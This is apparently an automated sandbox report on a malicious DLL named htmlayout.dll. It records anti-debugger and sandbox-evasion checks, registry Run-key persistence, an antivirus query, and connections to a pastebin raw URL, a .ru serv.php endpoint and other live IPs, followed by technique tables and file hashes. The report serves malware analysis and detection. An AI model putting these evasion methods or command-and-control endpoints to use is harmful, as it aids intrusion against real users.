Source: C:\Windows\SysWOW64\rundll32.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Windows\System32\loaddll32.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0478E37C FindFirstFileW,3_2_0478E37C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0478E37C FindFirstFileW,5_2_0478E37C
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 40000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 40000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 40000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 40000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 40000Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 40000
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 40000
Source: C:\Windows\SysWOW64\rundll32.exeThread delayed: delay time: 40000
Source: C:\Windows\System32\loaddll32.exeSystem information queried: ModuleInformationJump to behavior

Anti Debugging

barindex
Source: C:\Windows\System32\loaddll32.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread information set: HideFromDebuggerJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeThread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\rundll32.exeThread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\rundll32.exeThread information set: HideFromDebugger
Source: C:\Windows\SysWOW64\rundll32.exeOpen window title or class name: regmonclass
Source: C:\Windows\SysWOW64\rundll32.exeOpen window title or class name: gbdyllo
Source: C:\Windows\SysWOW64\rundll32.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Windows\SysWOW64\rundll32.exeOpen window title or class name: procmon_window_class
Source: C:\Windows\SysWOW64\rundll32.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Windows\SysWOW64\rundll32.exeOpen window title or class name: ollydbg
Source: C:\Windows\SysWOW64\rundll32.exeOpen window title or class name: filemonclass
Source: C:\Windows\SysWOW64\rundll32.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPortJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugObjectHandleJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugObjectHandle
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugObjectHandle
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugPort
Source: C:\Windows\SysWOW64\rundll32.exeProcess queried: DebugObjectHandle
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6016 -s 756Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 86.48.24.91 2000
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 172.67.34.170 443
Source: C:\Windows\SysWOW64\rundll32.exeDomain query: pastebin.com
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 104.20.68.143 443
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 141.8.197.42 80Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeDomain query: a0747694.xsph.ru
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 104.20.67.143 443Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\htmlayout.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6016 -s 756Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Windows Management Instrumentation
11
Registry Run Keys / Startup Folder
111
Process Injection
1
Masquerading
1
Input Capture
43
Security Software Discovery
Remote Services1
Input Capture
Exfiltration Over Other Network Medium1
Web Service
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts2
Command and Scripting Interpreter
1
DLL Side-Loading
11
Registry Run Keys / Startup Folder
1
Disable or Modify Tools
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Encrypted Channel
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)1
DLL Side-Loading
331
Virtualization/Sandbox Evasion
Security Account Manager331
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
Non-Standard Port
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
Process Injection
NTDS1
Application Window Discovery
Distributed Component Object ModelInput CaptureScheduled Transfer1
Ingress Tool Transfer
SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script2
Obfuscated Files or Information
LSA Secrets1
Remote System Discovery
SSHKeyloggingData Transfer Size Limits3
Non-Application Layer Protocol
Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
Rundll32
Cached Domain Credentials1
File and Directory Discovery
VNCGUI Input CaptureExfiltration Over C2 Channel14
Application Layer Protocol
Jamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items2
Software Packing
DCSync2
System Information Discovery
Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
DLL Side-Loading
Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 760314 Sample: htmlayout.dll Startdate: 04/12/2022 Architecture: WINDOWS Score: 100 53 Snort IDS alert for network traffic 2->53 55 Antivirus / Scanner detection for submitted sample 2->55 57 Multi AV Scanner detection for submitted file 2->57 59 3 other signatures 2->59 8 loaddll32.exe 1 2->8         started        11 rundll32.exe 2->11         started        13 rundll32.exe 2->13         started        process3 signatures4 61 Query firmware table information (likely to detect VMs) 8->61 63 Hides threads from debuggers 8->63 65 Tries to detect sandboxes / dynamic malware analysis system (registry check) 8->65 15 rundll32.exe 1 3 8->15         started        19 rundll32.exe 8->19         started        21 rundll32.exe 8->21         started        23 7 other processes 8->23 process5 dnsIp6 33 86.48.24.91, 2000, 49708, 49709 JAYNETSentiaDanmarkASDK Denmark 15->33 35 a0747694.xsph.ru 141.8.197.42, 49705, 80 SPRINTHOSTRU Russian Federation 15->35 37 pastebin.com 172.67.34.170, 443, 49706, 49707 CLOUDFLARENETUS United States 15->37 43 System process connects to network (likely due to code injection or exploit) 15->43 45 Tries to detect sandboxes and other dynamic analysis tools (window names) 15->45 47 Creates an autostart registry key pointing to binary in C:\Windows 15->47 39 104.20.67.143, 443, 49721 CLOUDFLARENETUS United States 19->39 49 Hides threads from debuggers 19->49 51 Tries to detect sandboxes / dynamic malware analysis system (registry check) 19->51 41 104.20.68.143, 443, 49720, 49726 CLOUDFLARENETUS United States 23->41 25 rundll32.exe 23->25         started        signatures7 process8 signatures9 67 Hides threads from debuggers 25->67 69 Tries to detect sandboxes / dynamic malware analysis system (registry check) 25->69 28 WerFault.exe 25->28         started        process10 dnsIp11 31 192.168.2.1 unknown unknown 28->31

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
htmlayout.dll42%VirustotalBrowse
htmlayout.dll100%AviraHEUR/AGEN.1217341
htmlayout.dll100%Joe Sandbox ML
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://www.indyproject.org/0%URL Reputationsafe
NameIPActiveMaliciousAntivirus DetectionReputation
a0747694.xsph.ru
141.8.197.42
truefalse
    high
    pastebin.com
    172.67.34.170
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      https://pastebin.com/raw/kk8ua858false
        high
        http://a0747694.xsph.ru/serv.phpfalse
          high
          NameSourceMaliciousAntivirus DetectionReputation
          http://www.indyproject.org/rundll32.exefalse
          • URL Reputation: safe
          unknown
          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs
          IPDomainCountryFlagASNASN NameMalicious
          104.20.68.143
          unknownUnited States
          13335CLOUDFLARENETUStrue
          86.48.24.91
          unknownDenmark
          16095JAYNETSentiaDanmarkASDKtrue
          141.8.197.42
          a0747694.xsph.ruRussian Federation
          35278SPRINTHOSTRUfalse
          104.20.67.143
          unknownUnited States
          13335CLOUDFLARENETUStrue
          172.67.34.170
          pastebin.comUnited States
          13335CLOUDFLARENETUSfalse
          IP
          192.168.2.1
          Joe Sandbox Version:36.0.0 Rainbow Opal
          Analysis ID:760314
          Start date and time:2022-12-04 22:23:14 +01:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 11m 56s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:htmlayout.dll
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:30
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.troj.evad.winDLL@27/6@9/6
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:Failed
          HCA Information:Failed
          Cookbook Comments:
          • Found application associated with file extension: .dll
          • Override analysis time to 240s for rundll32
          • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 52.182.143.212
          • Excluded domains from analysis (whitelisted): fs.microsoft.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, watson.telemetry.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          TimeTypeDescription
          22:24:26API Interceptor24x Sleep call for process: rundll32.exe modified
          22:24:30AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          22:24:34API Interceptor1x Sleep call for process: loaddll32.exe modified
          22:24:41AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run rundll32.exe C:\Windows\SysWOW64\rundll32.exe
          22:25:00API Interceptor1x Sleep call for process: WerFault.exe modified
          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          104.20.68.143eReceipt.vbsGet hashmaliciousBrowse
          • pastebin.com/raw/xcieuDzj
          QE2XQJIHZf.exeGet hashmaliciousBrowse
          • pastebin.com/raw/hbwHfEg3
          PI-INVTRD13022020_pdf.jsGet hashmaliciousBrowse
          • pastebin.com/raw/UBFKq2Rw
          Proforma_Invoice_10022020_pdf.jsGet hashmaliciousBrowse
          • pastebin.com/raw/UBFKq2Rw
          Jan-14-proforma-Invoice-pdf.jsGet hashmaliciousBrowse
          • pastebin.com/raw/kux21KmL
          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          pastebin.com620000.vbc.exeGet hashmaliciousBrowse
          • 172.67.34.170
          Mortage information files PDF_parsed.exeGet hashmaliciousBrowse
          • 104.20.68.143
          WqUfKPKgPP.exeGet hashmaliciousBrowse
          • 104.20.68.143
          AA7w56Lpwo.exeGet hashmaliciousBrowse
          • 104.20.67.143
          r9z1fvWkqb.exeGet hashmaliciousBrowse
          • 104.20.67.143
          file.exeGet hashmaliciousBrowse
          • 104.20.68.143
          file.exeGet hashmaliciousBrowse
          • 104.20.68.143
          9410577519C75DAB17A170287165CDD8F00F047FEE35A.exeGet hashmaliciousBrowse
          • 104.20.67.143
          6E587363F78CB91DE1B18CFE6A44174EB9426B724BCC7.exeGet hashmaliciousBrowse
          • 104.20.68.143
          63F13767CD38209385164D5517A55A6846996268F7C3C.exeGet hashmaliciousBrowse
          • 104.20.67.143
          Stealer.exeGet hashmaliciousBrowse
          • 172.67.34.170
          file.exeGet hashmaliciousBrowse
          • 104.20.68.143
          bryD1wfWrB.exeGet hashmaliciousBrowse
          • 172.67.34.170
          SecuriteInfo.com.Trojan.Siggen19.4846.9932.10970.exeGet hashmaliciousBrowse
          • 172.67.34.170
          SecuriteInfo.com.Win32.PWSX-gen.2031.32670.exeGet hashmaliciousBrowse
          • 172.67.34.170
          MDeBRRdude.exeGet hashmaliciousBrowse
          • 104.20.67.143
          bGSZ.exeGet hashmaliciousBrowse
          • 104.20.67.143
          bGU0.exeGet hashmaliciousBrowse
          • 104.20.67.143
          AT1VkguKRA.exeGet hashmaliciousBrowse
          • 172.67.34.170
          Monitor @1ona.exeGet hashmaliciousBrowse
          • 172.67.34.170
          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          JAYNETSentiaDanmarkASDKTRmkc8dY9M.exeGet hashmaliciousBrowse
          • 86.48.18.223
          EVONwD7gbk.elfGet hashmaliciousBrowse
          • 81.7.204.222
          uKN06IFwCa.elfGet hashmaliciousBrowse
          • 86.48.211.199
          LjxQ98SwUh.elfGet hashmaliciousBrowse
          • 86.58.241.150
          vfsBcVwlIu.elfGet hashmaliciousBrowse
          • 86.58.252.63
          Document.exeGet hashmaliciousBrowse
          • 86.48.29.24
          https://painel.odara.com.br/emailmarketing/campain/click?uid=0DHW80SjYatjGiCSkwyN2eeKdSd8HVv+iJnWZVl/UoM=&cid=6xe1ewmLWczb+HUGaeYvZAuCLGYFZNNJzds0ln/P/TA=&eid=URUSXf7/enbQ6EQ5gwS9413gHiXe/igU+f2AK4l3b1g=&url=https://7tp4d2.codesandbox.io/hh-mary.zakaria#bWFyeS56YWthcmlhQGxpcXVpZGl0eXNlcnZpY2VzLmNvbQ==Get hashmaliciousBrowse
          • 86.48.1.129
          https://painel.odara.com.br/emailmarketing/campain/click?uid=0DHW80SjYatjGiCSkwyN2eeKdSd8HVv+iJnWZVl/UoM=&cid=6xe1ewmLWczb+HUGaeYvZAuCLGYFZNNJzds0ln/P/TA=&eid=URUSXf7/enbQ6EQ5gwS9413gHiXe/igU+f2AK4l3b1g=&url=https://7tp4d2.codesandbox.io/hh-mary.zakaria#bWFyeS56YWthcmlhQGxpcXVpZGl0eXNlcnZpY2VzLmNvbQ==Get hashmaliciousBrowse
          • 86.48.1.129
          https://painel.odara.com.br/emailmarketing/campain/click?uid=0DHW80SjYatjGiCSkwyN2eeKdSd8HVv+iJnWZVl/UoM=&cid=6xe1ewmLWczb+HUGaeYvZAuCLGYFZNNJzds0ln/P/TA=&eid=URUSXf7/enbQ6EQ5gwS9413gHiXe/igU+f2AK4l3b1g=&url=https://7tp4d2.codesandbox.io/hh-lsanders#bHNhbmRlcnNAdHJnYXJ0cy5jb20=Get hashmaliciousBrowse
          • 86.48.1.129
          Document.exeGet hashmaliciousBrowse
          • 86.48.29.24
          https://painel.odara.com.br/emailmarketing/campain/click?uid=0DHW80SjYatjGiCSkwyN2eeKdSd8HVv+iJnWZVl/UoM=&cid=6xe1ewmLWczb+HUGaeYvZAuCLGYFZNNJzds0ln/P/TA=&eid=URUSXf7/enbQ6EQ5gwS9413gHiXe/igU+f2AK4l3b1g=&url=https://cjk6rs.codesandbox.io/hh-bryan_russell#YnJ5YW5fcnVzc2VsbEBiaW8tcmFkLmNvbQ==Get hashmaliciousBrowse
          • 86.48.1.129
          Document.exeGet hashmaliciousBrowse
          • 86.48.29.24
          SecuriteInfo.com.W32.Formbook.AA.tr.15260.exeGet hashmaliciousBrowse
          • 86.48.29.24
          DtXjxfIMmv.elfGet hashmaliciousBrowse
          • 86.58.241.117
          SecuriteInfo.com.Win32.TrojanX-gen.1760.exeGet hashmaliciousBrowse
          • 86.48.25.60
          VBCpxrl2G2.exeGet hashmaliciousBrowse
          • 86.48.20.106
          lfYru0uB7iGet hashmaliciousBrowse
          • 86.48.211.192
          home.armGet hashmaliciousBrowse
          • 86.48.211.160
          D5AeSqq60p.dllGet hashmaliciousBrowse
          • 81.7.195.31
          rfPNd4LGRlGet hashmaliciousBrowse
          • 86.58.252.65
          CLOUDFLARENETUSdoc_Factura_94670.htmlGet hashmaliciousBrowse
          • 104.17.70.176
          Benefits_Enrollment.shtmlGet hashmaliciousBrowse
          • 104.18.11.207
          xO5fHYl7CQ.elfGet hashmaliciousBrowse
          • 1.2.9.185
          KeLj9XZLwi.elfGet hashmaliciousBrowse
          • 1.13.147.38
          3ts2As2Bkm.exeGet hashmaliciousBrowse
          • 172.67.201.26
          Qeh843KFOM.exeGet hashmaliciousBrowse
          • 162.159.133.233
          zDEy5LlqAw.elfGet hashmaliciousBrowse
          • 104.17.222.236
          http://www.kylock.com/index.phpGet hashmaliciousBrowse
          • 188.114.97.3
          Confirmation transfer Ref No_00101334632192.exeGet hashmaliciousBrowse
          • 188.114.96.3
          QXt73akSrt.exeGet hashmaliciousBrowse
          • 188.114.97.3
          620000.vbc.exeGet hashmaliciousBrowse
          • 172.67.34.170
          1.exeGet hashmaliciousBrowse
          • 188.114.96.3
          1.exeGet hashmaliciousBrowse
          • 188.114.97.3
          1.exeGet hashmaliciousBrowse
          • 188.114.96.3
          OUTSTANDING PI770100059 SOA OCT 2022.IMGGet hashmaliciousBrowse
          • 172.67.186.195
          FA74917B3412CF02CEB60DE07292B3B5AD1B9553CF2B4.exeGet hashmaliciousBrowse
          • 172.67.172.157
          https://www.msn.com/en-gb/lifestyle/rf-best-products-uk/redirect?rf_dws_location=&rf_item_id=370742304&rf_list_id=112955&rf_partner_id=B089YK1QNQ&rf_source=amazon&url=aHR0cHM6Ly9jYmZ2di50b3A/ZT1kRzl0TG1Oc1lYSnJRR1poYVhSb2RHVmphRzV2Ykc5bmFXVnpMbU52YlE9PSMGet hashmaliciousBrowse
          • 104.16.169.131
          szA4lh2gwu.exeGet hashmaliciousBrowse
          • 162.159.135.233
          http://2no.coGet hashmaliciousBrowse
          • 104.16.201.58
          https://pddf.pages.dev/Get hashmaliciousBrowse
          • 188.114.97.3
          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          ce5f3254611a8c095a3d821d44539877file.exeGet hashmaliciousBrowse
          • 104.20.67.143
          • 104.20.68.143
          • 172.67.34.170
          file.exeGet hashmaliciousBrowse
          • 104.20.67.143
          • 104.20.68.143
          • 172.67.34.170
          file.exeGet hashmaliciousBrowse
          • 104.20.67.143
          • 104.20.68.143
          • 172.67.34.170
          file.exeGet hashmaliciousBrowse
          • 104.20.67.143
          • 104.20.68.143
          • 172.67.34.170
          file.exeGet hashmaliciousBrowse
          • 104.20.67.143
          • 104.20.68.143
          • 172.67.34.170
          file.exeGet hashmaliciousBrowse
          • 104.20.67.143
          • 104.20.68.143
          • 172.67.34.170
          file.exeGet hashmaliciousBrowse
          • 104.20.67.143
          • 104.20.68.143
          • 172.67.34.170
          file.exeGet hashmaliciousBrowse
          • 104.20.67.143
          • 104.20.68.143
          • 172.67.34.170
          file.exeGet hashmaliciousBrowse
          • 104.20.67.143
          • 104.20.68.143
          • 172.67.34.170
          file.exeGet hashmaliciousBrowse
          • 104.20.67.143
          • 104.20.68.143
          • 172.67.34.170
          file.exeGet hashmaliciousBrowse
          • 104.20.67.143
          • 104.20.68.143
          • 172.67.34.170
          file.exeGet hashmaliciousBrowse
          • 104.20.67.143
          • 104.20.68.143
          • 172.67.34.170
          file.exeGet hashmaliciousBrowse
          • 104.20.67.143
          • 104.20.68.143
          • 172.67.34.170
          file.exeGet hashmaliciousBrowse
          • 104.20.67.143
          • 104.20.68.143
          • 172.67.34.170
          file.exeGet hashmaliciousBrowse
          • 104.20.67.143
          • 104.20.68.143
          • 172.67.34.170
          file.exeGet hashmaliciousBrowse
          • 104.20.67.143
          • 104.20.68.143
          • 172.67.34.170
          file.exeGet hashmaliciousBrowse
          • 104.20.67.143
          • 104.20.68.143
          • 172.67.34.170
          file.exeGet hashmaliciousBrowse
          • 104.20.67.143
          • 104.20.68.143
          • 172.67.34.170
          file.exeGet hashmaliciousBrowse
          • 104.20.67.143
          • 104.20.68.143
          • 172.67.34.170
          file.exeGet hashmaliciousBrowse
          • 104.20.67.143
          • 104.20.68.143
          • 172.67.34.170
          No context
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):65536
          Entropy (8bit):1.0215467458793408
          Encrypted:false
          SSDEEP:192:5XdiA0oXvPHBUZMX4jed+RZKsD/u7scS274It7c:jiWXvPBUZMX4jes/u7scX4It7c
          MD5:4B69A3666F89E85953D70AFEC29DFD9D
          SHA1:B10B9ACEF7A762B4C0AF1124987579D19A91178A
          SHA-256:667FFAAB0792BBD3D4489542FA030C1C3810DAEDA340219579E21DCB349A9745
          SHA-512:B0D70D3CCD2F0C3E030F8FD89EF224C86C0A6FDB8AA172DBE4D9AE8452E66A53C6879C8E222E5FCDA20785D84833D95685691786CF81093542AB2BC8BFFD0278
          Malicious:false
          Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.4.6.9.5.0.8.4.6.2.9.9.6.6.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.4.6.9.5.0.8.9.7.2.9.8.9.9.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.f.2.f.e.5.e.f.-.c.6.f.e.-.4.d.8.6.-.8.f.c.b.-.a.f.2.a.1.4.0.1.7.1.f.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.3.3.e.0.8.1.a.-.b.4.1.d.-.4.9.0.3.-.a.8.f.2.-.6.c.e.b.3.b.0.6.7.2.5.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.8.0.-.0.0.0.1.-.0.0.1.f.-.4.b.5.8.-.7.3.2.c.7.2.0.8.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.b.5.f.!.r.
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:Mini DuMP crash report, 14 streams, Mon Dec 5 06:24:48 2022, 0x1205a4 type
          Category:dropped
          Size (bytes):47002
          Entropy (8bit):2.159034443727257
          Encrypted:false
          SSDEEP:192:XLc2BKUvRgUtO5SkbD3TQtWfOkXmu8SzQNl8iVPYDCZnBKI+:hRgJ5LbD0e4xVVwDkA1
          MD5:804867D39482879662E4186FB168B4A1
          SHA1:6CBEE7055BBE8AEE775469CF79DEA88B8FFFB664
          SHA-256:74406004B250A9C638D55D4418349B3165E01F6BEDDCD33D8EDF747B5C8F0B98
          SHA-512:5828FFB0D91FF26C13B22008BD2B7C0E37AA71B72C90110266EB4FC62CD07A0055EBFBFC3D3D27D076D440840A8A0866D46B1B2547EFE72EFD975428DF088E29
          Malicious:false
          Preview:MDMP....... ..........c.........................................3..........T.......8...........T.......................................!...................................................................U...........B......0"......GenuineIntelW...........T..............c.............................0..1...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
          Process:C:\Windows\SysWOW64\WerFault.exe
          File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
          Category:dropped
          Size (bytes):8338
          Entropy (8bit):3.6880641761395747
          Encrypted:false
          SSDEEP:192:Rrl7r3GLNi84696Ymd6zSgmf8EoSaCprX89bzUhwsf03xm:RrlsNiL696YE6zSgmf8EoSazMfv
          MD5:86AC64E872C4374DB9EBF5C88DE2E8F8
          SHA1:461AE2E1DF230D2BAF4C3C71C06F908BE54E1403
          SHA-256:19129FD37BBF9475AD80A061B2407DB5C5C7A8024ACE743DD712CBC5A4F0603A
          SHA-512:FC170C0B9DD0A0C829AE80A4A7B8036761FCCFC97FCEEAB46F84A64E90FA6D19B9605D5F1C377CB0346C90B4681F10FCBECC5E4557C864DD142827E304843761
          Malicious:false
